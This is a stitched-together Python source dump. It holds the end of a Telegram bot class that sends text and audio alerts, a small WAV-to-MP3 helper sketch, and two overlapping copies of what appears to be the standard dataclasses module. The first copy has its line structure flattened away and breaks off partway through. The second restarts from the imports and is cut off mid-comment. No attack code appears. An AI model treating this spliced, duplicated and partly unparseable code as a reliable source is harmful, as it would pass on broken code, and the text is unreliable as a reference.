        logger.info(f"🤖 Trying to upload audio in {mp3_file_path}...")
        # Use a context manager so the handle is closed even if the upload
        # fails and tenacity retries.
        with open(mp3_file_path, "rb") as voice_file:
            self.bot.send_voice(
                chat_id=os.environ[TELEGRAM_ID],
                voice=voice_file
            )

    def send_alert(self, message, wav_file_path=None, force_send=False):
        can_send = self.can_send_message(force_send)
        if not can_send:
            logger.info(f"❌ Not sending message: can_send={can_send}; force_send={force_send}.")
            return

        try:
            self.send_text_message(message, force_send)
            if wav_file_path is not None:
                mp3_file_path = convert_to_mp3(wav_file_path)
                if os.path.exists(mp3_file_path):
                    self.send_audio_message(mp3_file_path)
                    logger.info(f"🗑 Removing: {mp3_file_path}")
                    os.remove(mp3_file_path)
        except Exception as e:
            logger.info(f"❌ Failed to send alert: {str(e)}")
            logger.exception(e)
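# ---------------------------------------------------------------------------
# Hedged sketch of what src.util.audio.convert_to_mp3 (imported by the module
# above) could look like; its real implementation is not part of this dump.
# Assumes pydub is installed and ffmpeg is on PATH. Only the call shape used
# above (takes a .wav path, returns the .mp3 path) is taken from the source;
# everything else here is an illustrative assumption.
import os
from pydub import AudioSegment

def convert_to_mp3_sketch(wav_file_path: str) -> str:
    # Write the mp3 next to the input file, swapping the extension.
    mp3_file_path = os.path.splitext(wav_file_path)[0] + ".mp3"
    AudioSegment.from_wav(wav_file_path).export(mp3_file_path, format="mp3")
    return mp3_file_path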
import re import sys import copy import types import inspect import keyword import builtins import functools import abc import _thread from types import FunctionType, GenericAlias __all__ = ['dataclass', 'field', 'Field', 'FrozenInstanceError', 'InitVar', 'KW_ONLY', 'MISSING', # Helper functions. 'fields', 'asdict', 'astuple', 'make_dataclass', 'replace', 'is_dataclass', ] # Conditions for adding methods. The boxes indicate what action the # dataclass decorator takes. For all of these tables, when I talk # about init=, repr=, eq=, order=, unsafe_hash=, or frozen=, I'm # referring to the arguments to the @dataclass decorator. When # checking if a dunder method already exists, I mean check for an # entry in the class's __dict__. I never check to see if an attribute # is defined in a base class. # Key: # +=========+=========================================+ # + Value | Meaning | # +=========+=========================================+ # | <blank> | No action: no method is added. | # +---------+-----------------------------------------+ # | add | Generated method is added. | # +---------+-----------------------------------------+ # | raise | TypeError is raised. | # +---------+-----------------------------------------+ # | None | Attribute is set to None. | # +=========+=========================================+ # __init__ # # +--- init= parameter # | # v | | | # | no | yes | <--- class has __init__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __repr__ # # +--- repr= parameter # | # v | | | # | no | yes | <--- class has __repr__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __setattr__ # __delattr__ # # +--- frozen= parameter # | # v | | | # | no | yes | <--- class has __setattr__ or __delattr__ in __dict__? # +=======+=======+=======+ # | False | | | <- the default # +-------+-------+-------+ # | True | add | raise | # +=======+=======+=======+ # Raise because not adding these methods would break the "frozen-ness" # of the class. # __eq__ # # +--- eq= parameter # | # v | | | # | no | yes | <--- class has __eq__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __lt__ # __le__ # __gt__ # __ge__ # # +--- order= parameter # | # v | | | # | no | yes | <--- class has any comparison method in __dict__? # +=======+=======+=======+ # | False | | | <- the default # +-------+-------+-------+ # | True | add | raise | # +=======+=======+=======+ # Raise because to allow this case would interfere with using # functools.total_ordering. 
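# Two rows from the tables above, as commented examples (hypothetical
# classes, not part of this module):
#
#   @dataclass                  # repr=True is the default and C defines no
#   class C:                    # __repr__, so one is added:
#       x: int                  #     repr(C(1)) == 'C(x=1)'
#
#   @dataclass(order=True)      # D already has __lt__ in its __dict__, so
#   class D:                    # per the order table this raises TypeError
#       x: int                  # rather than silently overwriting it.
#       def __lt__(self, other):
#           ...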
# __hash__ # +------------------- unsafe_hash= parameter # | +----------- eq= parameter # | | +--- frozen= parameter # | | | # v v v | | | # | no | yes | <--- class has explicitly defined __hash__ # +=======+=======+=======+========+========+ # | False | False | False | | | No __eq__, use the base class __hash__ # +-------+-------+-------+--------+--------+ # | False | False | True | | | No __eq__, use the base class __hash__ # +-------+-------+-------+--------+--------+ # | False | True | False | None | | <-- the default, not hashable # +-------+-------+-------+--------+--------+ # | False | True | True | add | | Frozen, so hashable, allows override # +-------+-------+-------+--------+--------+ # | True | False | False | add | raise | Has no __eq__, but hashable # +-------+-------+-------+--------+--------+ # | True | False | True | add | raise | Has no __eq__, but hashable # +-------+-------+-------+--------+--------+ # | True | True | False | add | raise | Not frozen, but hashable # +-------+-------+-------+--------+--------+ # | True | True | True | add | raise | Frozen, so hashable # +=======+=======+=======+========+========+ # For boxes that are blank, __hash__ is untouched and therefore # inherited from the base class. If the base is object, then # id-based hashing is used. # # Note that a class may already have __hash__=None if it specified an # __eq__ method in the class body (not one that was created by # @dataclass). # # See _hash_action (below) for a coded version of this table. # __match_args__ # # +--- match_args= parameter # | # v | | | # | no | yes | <--- class has __match_args__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __match_args__ is always added unless the class already defines it. It is a # tuple of __init__ parameter names; non-init fields must be matched by keyword. # Raised when an attempt is made to modify a frozen class. class FrozenInstanceError(AttributeError): pass # A sentinel object for default values to signal that a default # factory will be used. This is given a nice repr() which will appear # in the function signature of dataclasses' constructors. class _HAS_DEFAULT_FACTORY_CLASS: def __repr__(self): return '<factory>' _HAS_DEFAULT_FACTORY = _HAS_DEFAULT_FACTORY_CLASS() # A sentinel object to detect if a parameter is supplied or not. Use # a class to give it a better repr. class _MISSING_TYPE: pass MISSING = _MISSING_TYPE() # A sentinel object to indicate that following fields are keyword-only by # default. Use a class to give it a better repr. class _KW_ONLY_TYPE: pass KW_ONLY = _KW_ONLY_TYPE() # Since most per-field metadata will be unused, create an empty # read-only proxy that can be shared among all fields. _EMPTY_METADATA = types.MappingProxyType({}) # Markers for the various kinds of fields and pseudo-fields. class _FIELD_BASE: def __init__(self, name): self.name = name def __repr__(self): return self.name _FIELD = _FIELD_BASE('_FIELD') _FIELD_CLASSVAR = _FIELD_BASE('_FIELD_CLASSVAR') _FIELD_INITVAR = _FIELD_BASE('_FIELD_INITVAR') # The name of an attribute on the class where we store the Field # objects. Also used to check if a class is a Data Class. _FIELDS = '__dataclass_fields__' # The name of an attribute on the class that stores the parameters to # @dataclass. _PARAMS = '__dataclass_params__' # The name of the function, that if it exists, is called at the end of # __init__. 
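# For example (hypothetical class, not part of this module), a field derived
# from the others can be computed at the end of __init__:
#
#   @dataclass
#   class Rect:
#       w: float
#       h: float
#       area: float = field(init=False)
#
#       def __post_init__(self):
#           self.area = self.w * self.h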
_POST_INIT_NAME = '__post_init__' # String regex that string annotations for ClassVar or InitVar must match. # Allows "identifier.identifier[" or "identifier[". # https://bugs.python.org/issue33453 for details. _MODULE_IDENTIFIER_RE = re.compile(r'^(?:\s*(\w+)\s*\.)?\s*(\w+)') class InitVar: __slots__ = ('type', ) def __init__(self, type): self.type = type def __repr__(self): if isinstance(self.type, type): type_name = self.type.__name__ else: # typing objects, e.g. List[int] type_name = repr(self.type) return f'dataclasses.InitVar[{type_name}]' def __class_getitem__(cls, type): return InitVar(type) # Instances of Field are only ever created from within this module, # and only from the field() function, although Field instances are # exposed externally as (conceptually) read-only objects. # # name and type are filled in after the fact, not in __init__. # They're not known at the time this class is instantiated, but it's # convenient if they're available later. # # When cls._FIELDS is filled in with a list of Field objects, the name # and type fields will have been populated. class Field: __slots__ = ('name', 'type', 'default', 'default_factory', 'repr', 'hash', 'init', 'compare', 'metadata', 'kw_only', '_field_type', # Private: not to be used by user code. ) def __init__(self, default, default_factory, init, repr, hash, compare, metadata, kw_only): self.name = None self.type = None self.default = default self.default_factory = default_factory self.init = init self.repr = repr self.hash = hash self.compare = compare self.metadata = (_EMPTY_METADATA if metadata is None else types.MappingProxyType(metadata)) self.kw_only = kw_only self._field_type = None def __repr__(self): return ('Field(' f'name={self.name!r},' f'type={self.type!r},' f'default={self.default!r},' f'default_factory={self.default_factory!r},' f'init={self.init!r},' f'repr={self.repr!r},' f'hash={self.hash!r},' f'compare={self.compare!r},' f'metadata={self.metadata!r},' f'kw_only={self.kw_only!r},' f'_field_type={self._field_type}' ')') # This is used to support the PEP 487 __set_name__ protocol in the # case where we're using a field that contains a descriptor as a # default value. For details on __set_name__, see # https://www.python.org/dev/peps/pep-0487/#implementation-details. # # Note that in _process_class, this Field object is overwritten # with the default value, so the end result is a descriptor that # had __set_name__ called on it at the right time. def __set_name__(self, owner, name): func = getattr(type(self.default), '__set_name__', None) if func: # There is a __set_name__ method on the descriptor, call # it. func(self.default, owner, name) __class_getitem__ = classmethod(GenericAlias) class _DataclassParams: __slots__ = ('init', 'repr', 'eq', 'order', 'unsafe_hash', 'frozen', ) def __init__(self, init, repr, eq, order, unsafe_hash, frozen): self.init = init self.repr = repr self.eq = eq self.order = order self.unsafe_hash = unsafe_hash self.frozen = frozen def __repr__(self): return ('_DataclassParams(' f'init={self.init!r},' f'repr={self.repr!r},' f'eq={self.eq!r},' f'order={self.order!r},' f'unsafe_hash={self.unsafe_hash!r},' f'frozen={self.frozen!r}' ')') # This function is used instead of exposing Field creation directly, # so that a type checker can be told (via overloads) that this is a # function whose type depends on its parameters. 
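# For example (hypothetical): a per-instance mutable default and a field
# hidden from repr():
#
#   @dataclass
#   class C:
#       tags: list = field(default_factory=list, repr=False)
#
# Each C() gets a fresh list, whereas a plain `tags: list = []` would raise
# ValueError ('mutable default ... use default_factory'), as enforced in
# _get_field() below.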
def field(*, default=MISSING, default_factory=MISSING, init=True, repr=True,
          hash=None, compare=True, metadata=None, kw_only=MISSING):
    """Return an object to identify dataclass fields.

    default is the default value of the field.  default_factory is a
    0-argument function called to initialize a field's value.  If init
    is true, the field will be a parameter to the class's __init__()
    function.  If repr is true, the field will be included in the
    object's repr().  If hash is true, the field will be included in
    the object's hash().  If compare is true, the field will be used
    in comparison functions.  metadata, if specified, must be a
    mapping which is stored but not otherwise examined by dataclass.
    If kw_only is true, the field will become a keyword-only parameter
    to __init__().

    It is an error to specify both default and default_factory.
    """

    if default is not MISSING and default_factory is not MISSING:
        raise ValueError('cannot specify both default and default_factory')
    return Field(default, default_factory, init, repr, hash, compare,
                 metadata, kw_only)


def _fields_in_init_order(fields):
    # Returns the fields as __init__ will output them.  It returns 2 tuples:
    # the first for normal args, and the second for keyword args.

    return (tuple(f for f in fields if f.init and not f.kw_only),
            tuple(f for f in fields if f.init and f.kw_only)
            )


def _tuple_str(obj_name, fields):
    # Return a string representing each field of obj_name as a tuple
    # member.  So, if fields is ['x', 'y'] and obj_name is "self",
    # return "(self.x,self.y)".

    # Special case for the 0-tuple.
    if not fields:
        return '()'
    # Note the trailing comma, needed if this turns out to be a 1-tuple.
    return f'({','.join([f'{obj_name}.{f.name}' for f in fields])},)'


# This function's logic is copied from "recursive_repr" function in
# reprlib module to avoid dependency.
def _recursive_repr(user_function):
    # Decorator to make a repr function return "..." for a recursive
    # call.
    repr_running = set()

    @functools.wraps(user_function)
    def wrapper(self):
        key = id(self), _thread.get_ident()
        if key in repr_running:
            return '...'
        repr_running.add(key)
        try:
            result = user_function(self)
        finally:
            repr_running.discard(key)
        return result
    return wrapper


def _create_fn(name, args, body, *, globals=None, locals=None,
               return_type=MISSING):
    # Note that we mutate locals when exec() is called.  Caller
    # beware!  The only callers are internal to this module, so no
    # worries about external callers.
    if locals is None:
        locals = {}
    if 'BUILTINS' not in locals:
        locals['BUILTINS'] = builtins
    return_annotation = ''
    if return_type is not MISSING:
        locals['_return_type'] = return_type
        return_annotation = '->_return_type'
    args = ','.join(args)
    body = '\n'.join(f'  {b}' for b in body)

    # Compute the text of the entire function.
    txt = f' def {name}({args}){return_annotation}:\n{body}'

    local_vars = ', '.join(locals.keys())
    txt = f"def __create_fn__({local_vars}):\n{txt}\n return {name}"
    ns = {}
    exec(txt, globals, ns)
    return ns['__create_fn__'](**locals)


def _field_assign(frozen, name, value, self_name):
    # If we're a frozen class, then assign to our fields in __init__
    # via object.__setattr__.  Otherwise, just use a simple
    # assignment.
    #
    # self_name is what "self" is called in this function: don't
    # hard-code "self", since that might be a field name.
    if frozen:
        return f'BUILTINS.object.__setattr__({self_name},{name!r},{value})'
    return f'{self_name}.{name}={value}'


def _field_init(f, frozen, globals, self_name):
    # Return the text of the line in the body of __init__ that will
    # initialize this field.
default_name = f'_dflt_{f.name}' if f.default_factory is not MISSING: if f.init: # This field has a default factory. If a parameter is # given, use it. If not, call the factory. globals[default_name] = f.default_factory value = (f'{default_name}() ' f'if {f.name} is _HAS_DEFAULT_FACTORY ' f'else {f.name}') else: # This is a field that's not in the __init__ params, but # has a default factory function. It needs to be # initialized here by calling the factory function, # because there's no other way to initialize it. # For a field initialized with a default=defaultvalue, the # class dict just has the default value # (cls.fieldname=defaultvalue). But that won't work for a # default factory, the factory must be called in __init__ # and we must assign that to self.fieldname. We can't # fall back to the class dict's value, both because it's # not set, and because it might be different per-class # (which, after all, is why we have a factory function!). globals[default_name] = f.default_factory value = f'{default_name}()' else: # No default factory. if f.init: if f.default is MISSING: # There's no default, just do an assignment. value = f.name elif f.default is not MISSING: globals[default_name] = f.default value = f.name else: # This field does not need initialization. Signify that # to the caller by returning None. return None # Only test this now, so that we can create variables for the # default. However, return None to signify that we're not going # to actually do the assignment statement for InitVars. if f._field_type is _FIELD_INITVAR: return None # Now, actually generate the field assignment. return _field_assign(frozen, f.name, value, self_name) def _init_param(f): # Return the __init__ parameter string for this field. For # example, the equivalent of 'x:int=3' (except instead of 'int', # reference a variable set to int, and instead of '3', reference a # variable set to 3). if f.default is MISSING and f.default_factory is MISSING: # There's no default, and no default_factory, just output the # variable name and type. default = '' elif f.default is not MISSING: # There's a default, this will be the name that's used to look # it up. default = f'=_dflt_{f.name}' elif f.default_factory is not MISSING: # There's a factory function. Set a marker. default = '=_HAS_DEFAULT_FACTORY' return f'{f.name}:_type_{f.name}{default}' def _init_fn(fields, std_fields, kw_only_fields, frozen, has_post_init, self_name, globals): # fields contains both real fields and InitVar pseudo-fields. # Make sure we don't have fields without defaults following fields # with defaults. This actually would be caught when exec-ing the # function source code, but catching it here gives a better error # message, and future-proofs us in case we build up the function # using ast. seen_default = False for f in std_fields: # Only consider the non-kw-only fields in the __init__ call. if f.init: if not (f.default is MISSING and f.default_factory is MISSING): seen_default = True elif seen_default: raise TypeError(f'non-default argument {f.name!r} ' 'follows default argument') locals = {f'_type_{f.name}': f.type for f in fields} locals.update({ 'MISSING': MISSING, '_HAS_DEFAULT_FACTORY': _HAS_DEFAULT_FACTORY, }) body_lines = [] for f in fields: line = _field_init(f, frozen, locals, self_name) # line is None means that this field doesn't require # initialization (it's a pseudo-field). Just skip it. if line: body_lines.append(line) # Does this class have a post-init function? 
if has_post_init: params_str = ','.join(f.name for f in fields if f._field_type is _FIELD_INITVAR) body_lines.append(f'{self_name}.{_POST_INIT_NAME}({params_str})') # If no body lines, use 'pass'. if not body_lines: body_lines = ['pass'] _init_params = [_init_param(f) for f in std_fields] if kw_only_fields: # Add the keyword-only args. Because the * can only be added if # there's at least one keyword-only arg, there needs to be a test here # (instead of just concatenting the lists together). _init_params += ['*'] _init_params += [_init_param(f) for f in kw_only_fields] return _create_fn('__init__', [self_name] + _init_params, body_lines, locals=locals, globals=globals, return_type=None) def _repr_fn(fields, globals): fn = _create_fn('__repr__', ('self',), ['return self.__class__.__qualname__ + f"(' + ', '.join([f"{f.name}={{self.{f.name}!r}}" for f in fields]) + ')"'], globals=globals) return _recursive_repr(fn) def _frozen_get_del_attr(cls, fields, globals): locals = {'cls': cls, 'FrozenInstanceError': FrozenInstanceError} if fields: fields_str = '(' + ','.join(repr(f.name) for f in fields) + ',)' else: # Special case for the zero-length tuple. fields_str = '()' return (_create_fn('__setattr__', ('self', 'name', 'value'), (f'if type(self) is cls or name in {fields_str}:', ' raise FrozenInstanceError(f"cannot assign to field {name!r}")', f'super(cls, self).__setattr__(name, value)'), locals=locals, globals=globals), _create_fn('__delattr__', ('self', 'name'), (f'if type(self) is cls or name in {fields_str}:', ' raise FrozenInstanceError(f"cannot delete field {name!r}")', f'super(cls, self).__delattr__(name)'), locals=locals, globals=globals), ) def _cmp_fn(name, op, self_tuple, other_tuple, globals): # Create a comparison function. If the fields in the object are # named 'x' and 'y', then self_tuple is the string # '(self.x,self.y)' and other_tuple is the string # '(other.x,other.y)'. return _create_fn(name, ('self', 'other'), [ 'if other.__class__ is self.__class__:', f' return {self_tuple}{op}{other_tuple}', 'return NotImplemented'], globals=globals) def _hash_fn(fields, globals): self_tuple = _tuple_str('self', fields) return _create_fn('__hash__', ('self',), [f'return hash({self_tuple})'], globals=globals) def _is_classvar(a_type, typing): # This test uses a typing internal class, but it's the best way to # test if this is a ClassVar. return (a_type is typing.ClassVar or (type(a_type) is typing._GenericAlias and a_type.__origin__ is typing.ClassVar)) def _is_initvar(a_type, dataclasses): # The module we're checking against is the module we're # currently in (dataclasses.py). return (a_type is dataclasses.InitVar or type(a_type) is dataclasses.InitVar) def _is_kw_only(a_type, dataclasses): return a_type is dataclasses.KW_ONLY def _is_type(annotation, cls, a_module, a_type, is_type_predicate): # Given a type annotation string, does it refer to a_type in # a_module? For example, when checking that annotation denotes a # ClassVar, then a_module is typing, and a_type is # typing.ClassVar. # It's possible to look up a_module given a_type, but it involves # looking in sys.modules (again!), and seems like a waste since # the caller already knows a_module. # - annotation is a string type annotation # - cls is the class that this annotation was found in # - a_module is the module we want to match # - a_type is the type in that module we want to match # - is_type_predicate is a function called with (obj, a_module) # that determines if obj is of the desired type. 
import re import sys import copy import types import inspect import keyword import builtins import functools import abc import _thread from types import FunctionType, GenericAlias __all__ = ['dataclass', 'field', 'Field', 'FrozenInstanceError', 'InitVar', 'KW_ONLY', 'MISSING', # Helper functions. 'fields', 'asdict', 'astuple', 'make_dataclass', 'replace', 'is_dataclass', ] # Conditions for adding methods. The boxes indicate what action the # dataclass decorator takes. For all of these tables, when I talk # about init=, repr=, eq=, order=, unsafe_hash=, or frozen=, I'm # referring to the arguments to the @dataclass decorator. When # checking if a dunder method already exists, I mean check for an # entry in the class's __dict__. I never check to see if an attribute # is defined in a base class. # Key: # +=========+=========================================+ # + Value | Meaning | # +=========+=========================================+ # | <blank> | No action: no method is added. | # +---------+-----------------------------------------+ # | add | Generated method is added. | # +---------+-----------------------------------------+ # | raise | TypeError is raised. | # +---------+-----------------------------------------+ # | None | Attribute is set to None. | # +=========+=========================================+ # __init__ # # +--- init= parameter # | # v | | | # | no | yes | <--- class has __init__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __repr__ # # +--- repr= parameter # | # v | | | # | no | yes | <--- class has __repr__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __setattr__ # __delattr__ # # +--- frozen= parameter # | # v | | | # | no | yes | <--- class has __setattr__ or __delattr__ in __dict__? # +=======+=======+=======+ # | False | | | <- the default # +-------+-------+-------+ # | True | add | raise | # +=======+=======+=======+ # Raise because not adding these methods would break the "frozen-ness" # of the class. # __eq__ # # +--- eq= parameter # | # v | | | # | no | yes | <--- class has __eq__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __lt__ # __le__ # __gt__ # __ge__ # # +--- order= parameter # | # v | | | # | no | yes | <--- class has any comparison method in __dict__? # +=======+=======+=======+ # | False | | | <- the default # +-------+-------+-------+ # | True | add | raise | # +=======+=======+=======+ # Raise because to allow this case would interfere with using # functools.total_ordering. 
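# A minimal illustrative sketch (assumed usage, not part of this module)
# of the "raise" cell in the ordering table above: combining order=True
# with a hand-written comparison method is rejected, since the decorator
# would otherwise silently clobber it.
#
#     @dataclass(order=True)
#     class C:
#         x: int
#         def __lt__(self, other): ...   # TypeError: Cannot overwrite
#                                        # attribute __lt__ in class C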
# __hash__ # +------------------- unsafe_hash= parameter # | +----------- eq= parameter # | | +--- frozen= parameter # | | | # v v v | | | # | no | yes | <--- class has explicitly defined __hash__ # +=======+=======+=======+========+========+ # | False | False | False | | | No __eq__, use the base class __hash__ # +-------+-------+-------+--------+--------+ # | False | False | True | | | No __eq__, use the base class __hash__ # +-------+-------+-------+--------+--------+ # | False | True | False | None | | <-- the default, not hashable # +-------+-------+-------+--------+--------+ # | False | True | True | add | | Frozen, so hashable, allows override # +-------+-------+-------+--------+--------+ # | True | False | False | add | raise | Has no __eq__, but hashable # +-------+-------+-------+--------+--------+ # | True | False | True | add | raise | Has no __eq__, but hashable # +-------+-------+-------+--------+--------+ # | True | True | False | add | raise | Not frozen, but hashable # +-------+-------+-------+--------+--------+ # | True | True | True | add | raise | Frozen, so hashable # +=======+=======+=======+========+========+ # For boxes that are blank, __hash__ is untouched and therefore # inherited from the base class. If the base is object, then # id-based hashing is used. # # Note that a class may already have __hash__=None if it specified an # __eq__ method in the class body (not one that was created by # @dataclass). # # See _hash_action (below) for a coded version of this table. # __match_args__ # # +--- match_args= parameter # | # v | | | # | no | yes | <--- class has __match_args__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __match_args__ is always added unless the class already defines it. It is a # tuple of __init__ parameter names; non-init fields must be matched by keyword. # Raised when an attempt is made to modify a frozen class. class FrozenInstanceError(AttributeError): pass # A sentinel object for default values to signal that a default # factory will be used. This is given a nice repr() which will appear # in the function signature of dataclasses' constructors. class _HAS_DEFAULT_FACTORY_CLASS: def __repr__(self): return '<factory>' _HAS_DEFAULT_FACTORY = _HAS_DEFAULT_FACTORY_CLASS() # A sentinel object to detect if a parameter is supplied or not. Use # a class to give it a better repr. class _MISSING_TYPE: pass MISSING = _MISSING_TYPE() # A sentinel object to indicate that following fields are keyword-only by # default. Use a class to give it a better repr. class _KW_ONLY_TYPE: pass KW_ONLY = _KW_ONLY_TYPE() # Since most per-field metadata will be unused, create an empty # read-only proxy that can be shared among all fields. _EMPTY_METADATA = types.MappingProxyType({}) # Markers for the various kinds of fields and pseudo-fields. class _FIELD_BASE: def __init__(self, name): self.name = name def __repr__(self): return self.name _FIELD = _FIELD_BASE('_FIELD') _FIELD_CLASSVAR = _FIELD_BASE('_FIELD_CLASSVAR') _FIELD_INITVAR = _FIELD_BASE('_FIELD_INITVAR') # The name of an attribute on the class where we store the Field # objects. Also used to check if a class is a Data Class. _FIELDS = '__dataclass_fields__' # The name of an attribute on the class that stores the parameters to # @dataclass. _PARAMS = '__dataclass_params__' # The name of the function, that if it exists, is called at the end of # __init__. 
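#
# Illustrative sketch (assumed usage, not part of this module) of how
# __post_init__ is typically combined with an init=False field:
#
#     @dataclass
#     class Rect:
#         w: float
#         h: float
#         area: float = field(init=False)
#
#         def __post_init__(self):
#             self.area = self.w * self.h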
_POST_INIT_NAME = '__post_init__' # String regex that string annotations for ClassVar or InitVar must match. # Allows "identifier.identifier[" or "identifier[". # https://bugs.python.org/issue33453 for details. _MODULE_IDENTIFIER_RE = re.compile(r'^(?:\s*(\w+)\s*\.)?\s*(\w+)') class InitVar: __slots__ = ('type', ) def __init__(self, type): self.type = type def __repr__(self): if isinstance(self.type, type): type_name = self.type.__name__ else: # typing objects, e.g. List[int] type_name = repr(self.type) return f'dataclasses.InitVar[{type_name}]' def __class_getitem__(cls, type): return InitVar(type) # Instances of Field are only ever created from within this module, # and only from the field() function, although Field instances are # exposed externally as (conceptually) read-only objects. # # name and type are filled in after the fact, not in __init__. # They're not known at the time this class is instantiated, but it's # convenient if they're available later. # # When cls._FIELDS is filled in with a list of Field objects, the name # and type fields will have been populated. class Field: __slots__ = ('name', 'type', 'default', 'default_factory', 'repr', 'hash', 'init', 'compare', 'metadata', 'kw_only', '_field_type', # Private: not to be used by user code. ) def __init__(self, default, default_factory, init, repr, hash, compare, metadata, kw_only): self.name = None self.type = None self.default = default self.default_factory = default_factory self.init = init self.repr = repr self.hash = hash self.compare = compare self.metadata = (_EMPTY_METADATA if metadata is None else types.MappingProxyType(metadata)) self.kw_only = kw_only self._field_type = None def __repr__(self): return ('Field(' f'name={self.name!r},' f'type={self.type!r},' f'default={self.default!r},' f'default_factory={self.default_factory!r},' f'init={self.init!r},' f'repr={self.repr!r},' f'hash={self.hash!r},' f'compare={self.compare!r},' f'metadata={self.metadata!r},' f'kw_only={self.kw_only!r},' f'_field_type={self._field_type}' ')') # This is used to support the PEP 487 __set_name__ protocol in the # case where we're using a field that contains a descriptor as a # default value. For details on __set_name__, see # https://www.python.org/dev/peps/pep-0487/#implementation-details. # # Note that in _process_class, this Field object is overwritten # with the default value, so the end result is a descriptor that # had __set_name__ called on it at the right time. def __set_name__(self, owner, name): func = getattr(type(self.default), '__set_name__', None) if func: # There is a __set_name__ method on the descriptor, call # it. func(self.default, owner, name) __class_getitem__ = classmethod(GenericAlias) class _DataclassParams: __slots__ = ('init', 'repr', 'eq', 'order', 'unsafe_hash', 'frozen', ) def __init__(self, init, repr, eq, order, unsafe_hash, frozen): self.init = init self.repr = repr self.eq = eq self.order = order self.unsafe_hash = unsafe_hash self.frozen = frozen def __repr__(self): return ('_DataclassParams(' f'init={self.init!r},' f'repr={self.repr!r},' f'eq={self.eq!r},' f'order={self.order!r},' f'unsafe_hash={self.unsafe_hash!r},' f'frozen={self.frozen!r}' ')') # This function is used instead of exposing Field creation directly, # so that a type checker can be told (via overloads) that this is a # function whose type depends on its parameters. 
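#
# Illustrative sketch (assumed usage, not part of this module) of the
# two ways a per-field default can be supplied through field():
#
#     @dataclass
#     class C:
#         x: int = field(default=0)              # shared immutable default
#         y: list = field(default_factory=list)  # fresh list per instance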
def field(*, default=MISSING, default_factory=MISSING, init=True, repr=True, hash=None, compare=True, metadata=None, kw_only=MISSING): """Return an object to identify dataclass fields. default is the default value of the field. default_factory is a 0-argument function called to initialize a field's value. If init is true, the field will be a parameter to the class's __init__() function. If repr is true, the field will be included in the object's repr(). If hash is true, the field will be included in the object's hash(). If compare is true, the field will be used in comparison functions. metadata, if specified, must be a mapping which is stored but not otherwise examined by dataclass. If kw_only is true, the field will become a keyword-only parameter to __init__(). It is an error to specify both default and default_factory. """ if default is not MISSING and default_factory is not MISSING: raise ValueError('cannot specify both default and default_factory') return Field(default, default_factory, init, repr, hash, compare, metadata, kw_only) def _fields_in_init_order(fields): # Returns the fields as __init__ will output them. It returns 2 tuples: # the first for normal args, and the second for keyword args. return (tuple(f for f in fields if f.init and not f.kw_only), tuple(f for f in fields if f.init and f.kw_only) ) def _tuple_str(obj_name, fields): # Return a string representing each field of obj_name as a tuple # member. So, if fields is ['x', 'y'] and obj_name is "self", # return "(self.x,self.y)". # Special case for the 0-tuple. if not fields: return '()' # Note the trailing comma, needed if this turns out to be a 1-tuple. return f'({",".join([f"{obj_name}.{f.name}" for f in fields])},)' # This function's logic is copied from "recursive_repr" function in # reprlib module to avoid dependency. def _recursive_repr(user_function): # Decorator to make a repr function return "..." for a recursive # call. repr_running = set() @functools.wraps(user_function) def wrapper(self): key = id(self), _thread.get_ident() if key in repr_running: return '...' repr_running.add(key) try: result = user_function(self) finally: repr_running.discard(key) return result return wrapper def _create_fn(name, args, body, *, globals=None, locals=None, return_type=MISSING): # Note that we mutate locals when exec() is called. Caller # beware! The only callers are internal to this module, so no # worries about external callers. if locals is None: locals = {} if 'BUILTINS' not in locals: locals['BUILTINS'] = builtins return_annotation = '' if return_type is not MISSING: locals['_return_type'] = return_type return_annotation = '->_return_type' args = ','.join(args) body = '\n'.join(f' {b}' for b in body) # Compute the text of the entire function. txt = f' def {name}({args}){return_annotation}:\n{body}' local_vars = ', '.join(locals.keys()) txt = f"def __create_fn__({local_vars}):\n{txt}\n return {name}" ns = {} exec(txt, globals, ns) return ns['__create_fn__'](**locals) def _field_assign(frozen, name, value, self_name): # If we're a frozen class, then assign to our fields in __init__ # via object.__setattr__. Otherwise, just use a simple # assignment. # # self_name is what "self" is called in this function: don't # hard-code "self", since that might be a field name. if frozen: return f'BUILTINS.object.__setattr__({self_name},{name!r},{value})' return f'{self_name}.{name}={value}' def _field_init(f, frozen, globals, self_name): # Return the text of the line in the body of __init__ that will # initialize this field. 
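    # Illustrative examples (assumed, for a field named 'x' in a
    # non-frozen class) of the text this returns:
    #   default_factory and init=True:
    #       "self.x=_dflt_x() if x is _HAS_DEFAULT_FACTORY else x"
    #   default_factory and init=False:
    #       "self.x=_dflt_x()"
    #   plain default, or no default:
    #       "self.x=x"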
default_name = f'_dflt_{f.name}' if f.default_factory is not MISSING: if f.init: # This field has a default factory. If a parameter is # given, use it. If not, call the factory. globals[default_name] = f.default_factory value = (f'{default_name}() ' f'if {f.name} is _HAS_DEFAULT_FACTORY ' f'else {f.name}') else: # This is a field that's not in the __init__ params, but # has a default factory function. It needs to be # initialized here by calling the factory function, # because there's no other way to initialize it. # For a field initialized with a default=defaultvalue, the # class dict just has the default value # (cls.fieldname=defaultvalue). But that won't work for a # default factory, the factory must be called in __init__ # and we must assign that to self.fieldname. We can't # fall back to the class dict's value, both because it's # not set, and because it might be different per-class # (which, after all, is why we have a factory function!). globals[default_name] = f.default_factory value = f'{default_name}()' else: # No default factory. if f.init: if f.default is MISSING: # There's no default, just do an assignment. value = f.name elif f.default is not MISSING: globals[default_name] = f.default value = f.name else: # This field does not need initialization. Signify that # to the caller by returning None. return None # Only test this now, so that we can create variables for the # default. However, return None to signify that we're not going # to actually do the assignment statement for InitVars. if f._field_type is _FIELD_INITVAR: return None # Now, actually generate the field assignment. return _field_assign(frozen, f.name, value, self_name) def _init_param(f): # Return the __init__ parameter string for this field. For # example, the 